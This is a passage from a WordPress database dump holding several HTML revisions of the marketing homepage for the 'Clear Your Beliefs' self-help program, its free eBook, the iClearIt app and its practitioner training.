id="righttext">\r\n\r\n&nbsp;\r\n<h3>How and Why It Works</h3>\r\n<ul>\r\n	<li>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they live</li>\r\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\r\n	<li>You take charge and decide what you want to believe</li>\r\n	<li>You’re guided gently, step-by-step, through the entire process</li>\r\n	<li>You decide how far to go, and what changes to make</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<img class="aligncenter size-medium wp-image-1433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />\r\n<div>\r\n\r\nI’m Lion Goodman, creator of the Clear Your Beliefs program. I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.). I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs. Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself. The only question is, “What’s the best way to change my beliefs?” This is it. I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind. Read the eBook, and download the free app. Then come back and purchase the Clear Your Beliefs program. I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet. You’ll feel better, function better, and resistance and blocks will melt away – like magic. And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback. I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="" />\r\n\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<div class="bott_heading">\r\n<h3>Are you a Coach? Therapist? Healer? Change Agent?</h3>\r\nBring the Clear Your Beliefs process into your practice. Help your clients clear their beliefs so they can move their lives forward.\r\n\r\n</div>\r\n<div id="bottom_buttons">\r\n<div class="bott_button"><a>Click HERE to Learn More</a></div>\r\n</div>\r\n</div>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-27 11:13:09', '2014-09-27 16:13:09', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1448, 4194, '2014-09-27 11:16:01', '2014-09-27 16:16:01', '<div id="main">\r\n<div id="logo"><img src="http://beliefcloset.com/cyb/wp-content/themes/clearyourbeliefs/images/cyb-header.jpg" alt="" width="650px" height="141px" /></div>\r\n<div id="banner"><img style="margin: 0px; cursor: pointer;" src="images/banner-new.jpg" alt="" width="562px" height="292px" /></div>\r\n<div id="three_steps">\r\n<div class="step1">\r\n<div class="stepinner">\r\n<h1>Clear Your Beliefs eBOOK</h1>\r\n<h2>DOWNLOAD THE FREE</h2>\r\n<h2>eBOOK</h2>\r\n<img class="aligncenter  wp-image-433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="120" height="155" />\r\n<div id="step1_button">\r\n<div id="mc_embed_signup" style="width: 240px; margin-left: 9px;"><form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n<table border="1" cellspacing="3" cellpadding="2">\r\n<tbody>\r\n<tr>\r\n<td class="frmtext"><b>First Name</b></td>\r\n<td><input id="mce-FNAME" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="FNAME" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<b>Email</b>\r\n\r\n<input id="mce-EMAIL" class="required email" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="EMAIL" type="text" />\r\n\r\n</div>\r\n<input style="padding-top: 10px;" name="Submit" src="images/get_access.png" type="image" value="Submit" />\r\n\r\n</form></div>\r\n<div id="mindmaster_img"><img class="aligncenter  wp-image-1445" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/logo-globe.jpg" alt="logo-globe" width="123" height="132" /></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step2">\r\n<div class="stepinner">\r\n<h1>iClearIt APP</h1>\r\n<h2>DOWNLOAD THE</h2>\r\niClearIt APP\r\n<div id="button">\r\n<div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" alt="" width="224px" height="52px" /></a></div>\r\n<div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png" alt="" width="224px" height="52px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step3">\r\n<div class="stepinner">\r\n<h1>CLEAR YOUR BELIEFS</h1>\r\n<div id="step3_img"><img src="images/step3_img.png" alt="" width="201px" height="161px" /></div>\r\n<h2>Choose a Goal &amp;</h2>\r\nMaster Your Chosen Life\r\n<div class="step3_buttons"><a><img src="images/step3_button.png" alt="" width="204px" height="62px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id="textarea">\r\n<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish\r\nwith\r\nClear Your Beliefs</h3>\r\n<ul>\r\n	<li>Release hurt and pain from the past</li>\r\n	<li>Clear resistance to taking action</li>\r\n	<li>Open to new possibilities</li>\r\n	<li>Eliminate blocks to manifestation</li>\r\n	<li>Find your true purpose</li>\r\n	<li>Delete what’s been holding you back</li>\r\n	<li>Change your personality style</li>\r\n	<li>Open to deeper, more profound love</li>\r\n	<li>Recognize your spiritual nature</li>\r\n	<li>Become less reactive, more calm</li>\r\n	<li>Rediscover the source of your personal power</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n\r\n&nbsp;\r\n<h3>How and Why It Works</h3>\r\n<ul>\r\n	<li>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they live</li>\r\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\r\n	<li>You take charge and decide what you want to believe</li>\r\n	<li>You’re guided gently, step-by-step, through the entire process</li>\r\n	<li>You decide how far to go, and what changes to make</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<img class="aligncenter size-medium wp-image-1433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />\r\n<div>\r\n\r\nI’m Lion Goodman, creator of the Clear Your Beliefs program. I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.). I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs. Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself. The only question is, “What’s the best way to change my beliefs?” This is it. I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind. Read the eBook, and download the free app. Then come back and purchase the Clear Your Beliefs program. I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet. You’ll feel better, function better, and resistance and blocks will melt away – like magic. And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback. I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="" />\r\n\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<div class="bott_heading">\r\n<h3>Are you a Coach? Therapist? Healer? Change Agent?</h3>\r\nBring the Clear Your Beliefs process into your practice. Help your clients clear their beliefs so they can move their lives forward.\r\n\r\n</div>\r\n<div id="bottom_buttons">\r\n<div class="bott_button"><a>Click HERE to Learn More</a></div>\r\n</div>\r\n</div>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-27 11:16:01', '2014-09-27 16:16:01', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1447, 4194, '2014-09-27 11:14:40', '2014-09-27 16:14:40', '<div id="main">\r\n<div id="logo"><img src="http://beliefcloset.com/cyb/wp-content/themes/clearyourbeliefs/images/cyb-header.jpg" alt="" width="650px" height="141px" /></div>\r\n<div id="banner"><img style="margin: 0px; cursor: pointer;" src="images/banner-new.jpg" alt="" width="562px" height="292px" /></div>\r\n<div id="three_steps">\r\n<div class="step1">\r\n<div class="stepinner">\r\n<h1>Clear Your Beliefs eBOOK</h1>\r\n<h2>DOWNLOAD THE FREE</h2>\r\n<h2>eBOOK</h2>\r\n<img class="aligncenter size-medium wp-image-433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="75" height="auto" />\r\n<div id="step1_button">\r\n<div id="mc_embed_signup" style="width: 240px; margin-left: 9px;"><form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n<table border="1" cellspacing="3" cellpadding="2">\r\n<tbody>\r\n<tr>\r\n<td class="frmtext"><b>First Name</b></td>\r\n<td><input id="mce-FNAME" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="FNAME" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<b>Email</b>\r\n\r\n<input id="mce-EMAIL" class="required email" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="EMAIL" type="text" />\r\n\r\n</div>\r\n<input style="padding-top: 10px;" name="Submit" src="images/get_access.png" type="image" value="Submit" />\r\n\r\n</form></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step2">\r\n<div class="stepinner">\r\n<h1>iClearIt APP</h1>\r\n<div id="mindmaster_img"><img class="aligncenter  wp-image-1445" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/logo-globe.jpg" alt="logo-globe" width="123" height="132" /></div>\r\n<h2>DOWNLOAD THE</h2>\r\niClearIt APP\r\n<div id="button">\r\n<div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" alt="" width="224px" height="52px" /></a></div>\r\n<div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png" alt="" width="224px" height="52px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step3">\r\n<div class="stepinner">\r\n<h1>CLEAR YOUR BELIEFS</h1>\r\n<div id="step3_img"><img src="images/step3_img.png" alt="" width="201px" height="161px" /></div>\r\n<h2>Choose a Goal &amp;</h2>\r\nMaster Your Chosen Life\r\n<div class="step3_buttons"><a><img src="images/step3_button.png" alt="" width="204px" height="62px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id="textarea">\r\n<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish\r\nwith\r\nClear Your Beliefs</h3>\r\n<ul>\r\n	<li>Release hurt and pain from the past</li>\r\n	<li>Clear resistance to taking action</li>\r\n	<li>Open to new possibilities</li>\r\n	<li>Eliminate blocks to manifestation</li>\r\n	<li>Find your true purpose</li>\r\n	<li>Delete what’s been holding you back</li>\r\n	<li>Change your personality style</li>\r\n	<li>Open to deeper, more profound love</li>\r\n	<li>Recognize your spiritual nature</li>\r\n	<li>Become less reactive, more calm</li>\r\n	<li>Rediscover the source of your personal power</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n\r\n&nbsp;\r\n<h3>How and Why It Works</h3>\r\n<ul>\r\n	<li>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they live</li>\r\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\r\n	<li>You take charge and decide what you want to believe</li>\r\n	<li>You’re guided gently, step-by-step, through the entire process</li>\r\n	<li>You decide how far to go, and what changes to make</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<img class="aligncenter size-medium wp-image-1433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />\r\n<div>\r\n\r\nI’m Lion Goodman, creator of the Clear Your Beliefs program. I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.). I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs. Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself. The only question is, “What’s the best way to change my beliefs?” This is it. I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind. Read the eBook, and download the free app. Then come back and purchase the Clear Your Beliefs program. I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet. You’ll feel better, function better, and resistance and blocks will melt away – like magic. And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback. I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="" />\r\n\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<div class="bott_heading">\r\n<h3>Are you a Coach? Therapist? Healer? Change Agent?</h3>\r\nBring the Clear Your Beliefs process into your practice. Help your clients clear their beliefs so they can move their lives forward.\r\n\r\n</div>\r\n<div id="bottom_buttons">\r\n<div class="bott_button"><a>Click HERE to Learn More</a></div>\r\n</div>\r\n</div>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-27 11:14:40', '2014-09-27 16:14:40', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1450, 2, '2014-10-06 23:16:47', '2014-10-07 04:16:47', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nThe App\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the App</strong>\nfor iPhone &#038; iPad\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Only $4.99!</p>\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://www.clearbeliefs.com" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="__blank"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home - Clear your Beliefs - use this', '', 'publish', 'closed', 'open', '', 'main', '', '', '2015-07-08 00:25:21', '2015-07-08 05:25:21', '', 0, 'http://clearyourbeliefs.com/?page_id=1450', 0, 'page', '', 0),
(1771, 2, '2014-11-18 18:42:08', '2014-11-18 23:42:08', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-18 18:42:08', '2014-11-18 23:42:08', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1760, 2, '2014-11-16 21:17:08', '2014-11-17 02:17:08', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\n<p>Free App</p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><p></p><p> </p> <p>  </p>Complete Program', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-16 21:17:08', '2014-11-17 02:17:08', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1765, 2, '2014-11-16 23:39:02', '2014-11-17 04:39:02', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-16 23:39:02', '2014-11-17 04:39:02', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1743, 2, '2014-11-14 00:29:57', '2014-11-14 05:29:57', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program<img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center;margin-top: 18px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-14 00:29:57', '2014-11-14 05:29:57', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
